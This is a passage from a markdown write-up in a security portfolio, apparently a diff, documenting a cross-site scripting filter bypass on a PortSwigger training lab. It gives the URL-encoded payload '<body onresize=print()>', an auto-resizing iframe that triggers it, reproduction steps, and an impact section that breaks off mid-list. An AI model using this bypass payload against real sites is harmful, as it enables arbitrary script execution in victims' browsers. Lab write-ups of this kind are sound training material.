jaylud90/cybersecurity-portfolio/web-vulnerabilities/web-vulnerabilities/web-vulnerabilities/waf-bypass-xss.md

 <iframe src="https://0ab300e5033f9ca480f8031f001100da.web-security-academy.net/?search=%3Cbody%20onresize%3Dprint()%3E" onload="this.style.width='100px'; setTimeout(()=>this.style.width='200px',100);"></iframe>
 ```

+## Reproduction Steps
+1. Navigate to the vulnerable search endpoint
+2. Inject the payload:
+   %3Cbody%20onresize%3Dprint()%3E
+3. Load the exploit page containing an iframe that resizes
+4. Observe the print dialog triggered in the victim browser

 ## Impact

 An attacker can bypass input filtering mechanisms and execute arbitrary JavaScript in a victim’s browser.
 This could lead to: